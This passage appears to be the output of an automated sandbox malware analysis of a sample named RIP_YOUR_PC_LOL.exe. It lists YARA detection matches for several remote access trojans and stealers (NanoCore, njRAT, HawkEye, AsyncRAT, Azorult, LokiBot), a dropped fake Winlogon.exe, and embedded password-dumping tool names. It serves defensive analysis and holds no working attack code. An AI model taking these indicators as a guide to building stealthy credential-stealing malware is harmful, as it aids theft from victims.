                    Source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000008.00000002.449565052.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0000002A.00000000.507357595.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000011.00000002.701265514.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0000003B.00000000.627731740.00000000007A2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000011.00000003.646152049.0000000001338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000024.00000000.475797127.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000024.00000000.475797127.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000006.00000002.701971433.0000000001354000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0000001C.00000002.567040014.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000019.00000003.459495184.0000000000673000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002E.00000000.548907669.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000011.00000000.445251023.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0000002E.00000002.610238464.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002A.00000002.552899490.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000005.00000002.706080641.00000000036DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000006.00000000.405813841.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000008.00000000.410285813.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000005.00000002.712472379.0000000007710000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000008.00000000.408615715.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000011.00000000.447375879.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000006.00000000.394727625.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000026.00000000.491059532.0000000000272000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000026.00000000.491059532.0000000000272000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000006.00000000.399704980.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000024.00000002.629223400.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000024.00000002.629223400.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000006.00000002.703770994.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000019.00000003.459275166.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000019.00000003.458681148.000000000067C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.579383399.0000000004081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000000.00000003.386628983.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0000001C.00000002.514866763.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0000001C.00000002.514866763.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000011.00000000.446671445.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 00000008.00000000.409570794.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000019.00000003.458183685.0000000000660000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: C:\Users\user\AppData\Roaming\22.exeFile created: C:\Windows\Help\Winlogon.exe
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: String function: 00F5BA9D appears 35 times
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefreeeim.exe vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamereiudxamcsyuasdx.exe [repeating PADDINGXX filler run truncated]
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameStub.exe" vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamehealastounding.exe4 vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamefoampounding.exe, vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamereiudxamcsyuasdx.exe [repeating PADDINGXX filler run truncated]
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameStub.exe" vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamehealastounding.exe4 vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamemailpv.exe< vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamePhulli.exe0 vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameactive_desktop_launcher.exe, vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000002.696291372.0000000004350000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamebaseline.dll4 vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000002.696610265.00000000057AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamefreeeim.exe vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemailpv.exe< vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePhulli.exe0 vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameactive_desktop_launcher.exe, vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000003.388706064.0000000005956000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamereiudxamcsyuasdx.exe [repeating PADDINGXX filler run truncated]
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000002.696344828.00000000046D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebaseline.dll4 vs RIP_YOUR_PC_LOL.exe
